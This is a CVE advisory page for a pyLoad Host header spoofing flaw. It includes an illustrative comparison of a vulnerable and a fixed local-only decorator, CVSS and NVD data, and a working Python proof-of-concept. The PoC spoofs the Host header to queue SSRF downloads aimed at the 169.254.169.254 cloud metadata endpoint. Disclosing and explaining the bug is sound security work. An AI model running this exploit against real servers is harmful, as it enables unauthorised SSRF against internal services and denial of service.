Security Vulnerability Report
CVE-2026-33314 CVSS 6.5 MEDIUM

Published: 2026-03-24 20:16:28
Last Modified: 2026-03-26 12:01:09

Description

pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host header spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions: the Host header is supplied by the client, so a check that accepts it as evidence of a loopback connection is satisfied by any remote request that sets it to a local value. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, which leads to Server-Side Request Forgery (SSRF, the pyLoad host fetches an attacker-chosen URL) and Denial of Service (DoS, the queue is filled with junk downloads). This issue has been patched in version 0.5.0b3.dev97.
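The bypass described above, as an added illustration of the bug class rather than pyLoad's own code: a "local-only" decorator that is satisfied by either the peer address or the client-controlled Host header, beside a hardened form that consults only the peer address. The port 9666 in the allow-list, the stand-in handler and the request dictionaries are assumptions constructed for this example.

```python
import ipaddress
from functools import wraps

# Host values the illustrative check treats as "local". The port is an
# assumption for this example; the real list in pyLoad may differ.
LOCAL_HOSTS = {"127.0.0.1:9666", "localhost:9666", "[::1]:9666"}


def is_loopback(remote_addr):
    """True only for a loopback peer address (127.0.0.0/8, ::1, or the
    IPv4-mapped form ::ffff:127.x.x.x). Garbage parses as not-loopback."""
    try:
        addr = ipaddress.ip_address(remote_addr)
    except ValueError:
        return False
    # Unwrap IPv4-mapped IPv6 so a dual-stack listener classifies correctly.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_loopback


def local_check_vulnerable(handler):
    """Modelled on the flaw in CVE-2026-33314: the request passes if EITHER
    the peer address is loopback OR the Host header names a local host.
    The second branch is attacker-controlled, so the check is bypassable."""
    @wraps(handler)
    def wrapper(environ):
        if is_loopback(environ.get("REMOTE_ADDR", "")) or \
                environ.get("HTTP_HOST", "") in LOCAL_HOSTS:
            return handler(environ)
        return ("403 Forbidden", "")
    return wrapper


def local_check_fixed(handler):
    """Hardened form: trust only the transport-level peer address, which a
    remote client cannot set. The Host header is never consulted."""
    @wraps(handler)
    def wrapper(environ):
        if is_loopback(environ.get("REMOTE_ADDR", "")):
            return handler(environ)
        return ("403 Forbidden", "")
    return wrapper


def add_package(environ):
    """Stand-in for a Click'N'Load handler that queues a download."""
    return ("200 OK", f"queued {environ.get('wsgi.input', '')}")


# Constructed WSGI-style requests (not captured traffic): a genuine local
# client, and an external client that forges the Host header.
LOCAL_REQUEST = {
    "REMOTE_ADDR": "127.0.0.1",
    "HTTP_HOST": "127.0.0.1:9666",
    "wsgi.input": "http://example.com/file.bin",
}
SPOOFED_REQUEST = {
    "REMOTE_ADDR": "203.0.113.7",
    "HTTP_HOST": "127.0.0.1:9666",
    "wsgi.input": "http://169.254.169.254/latest/meta-data/",
}


def run_matrix():
    """Run both decorators against both requests; return the status lines."""
    results = {}
    for name, decorator in (("vulnerable", local_check_vulnerable),
                            ("fixed", local_check_fixed)):
        protected = decorator(add_package)
        results[name] = {
            "local": protected(LOCAL_REQUEST)[0],
            "spoofed": protected(SPOOFED_REQUEST)[0],
        }
    return results


if __name__ == "__main__":
    for name, outcome in run_matrix().items():
        print(f"{name:10s} local={outcome['local']:14s} spoofed={outcome['spoofed']}")
```

The vulnerable decorator admits the spoofed request (200 OK) while the fixed one rejects it (403 Forbidden); both still admit the genuine local client. Two caveats for the fixed form: behind a reverse proxy REMOTE_ADDR is the proxy's address, so the check denies everything, and "fixing" that by trusting X-Forwarded-For reintroduces exactly the spoofing problem unless the header is stripped and re-set by a proxy you control.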

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:* - VULNERABLE
pyLoad < 0.5.0b3.dev97

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_poc(target_url, ssrf_target):
    """
    PoC for CVE-2026-33314: pyLoad Host Header Spoofing
    """
    # The Click'N'Load API endpoint usually resides here. The path, the Host
    # value and the form fields below are this PoC's assumptions; confirm them
    # against the vendor advisory and the source of the version under test.
    api_endpoint = f"{target_url}/api/cnl"

    # Spoof the Host header to bypass the @local_check decorator. The value
    # the check compares against is version-specific and may include a port.
    headers = {
        "Host": "127.0.0.1",
        "User-Agent": "CVE-2026-33314-Exploit",
    }

    # Payload to queue a download (can be an internal resource for SSRF)
    data = {
        "urls": ssrf_target,
        "package": "PoC_Exploit",
    }

    try:
        print(f"[*] Sending request to {api_endpoint} with spoofed Host header...")
        response = requests.post(api_endpoint, headers=headers, data=data, timeout=5)
        # A 200 only shows the local-only check was passed; verify that the
        # package actually appeared in the queue before calling it exploited.
        if response.status_code == 200:
            print("[+] Request successful! Payload likely queued.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://<vulnerable-pyload-host>:8000"
    # Replace with an internal target for SSRF (e.g., http://127.0.0.1:80)
    internal_target = "http://169.254.169.254/latest/meta-data/"
    exploit_poc(target, internal_target)

References

https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r (Vendor Advisory, Exploit)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33314",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-24T20:16:27.690",
    "lastModified": "2026-03-26T12:01:09.083",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97."
      },
      {
        "lang": "es",
        "value": "pyLoad es un gestor de descargas de código abierto y gratuito escrito en Python. Antes de la versión 0.5.0b3.dev97, una vulnerabilidad de suplantación de encabezado de host en el decorador @local_check permite a atacantes externos no autenticados eludir las restricciones de solo acceso local. Esto otorga acceso a los puntos finales de la API de Click'N'Load, lo que permite a los atacantes poner en cola descargas arbitrarias de forma remota, lo que lleva a la falsificación de petición del lado del servidor (SSRF) y a la denegación de servicio (DoS). Este problema ha sido parcheado en la versión 0.5.0b3.dev97."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-287"},
          {"lang": "en", "value": "CWE-346"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:pyload-ng_project:pyload-ng:*:*:*:*:*:python:*:*",
                "versionEndExcluding": "0.5.0b3.dev97",
                "matchCriteriaId": "49DB5560-08BC-47E1-ADC3-729D9746159F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}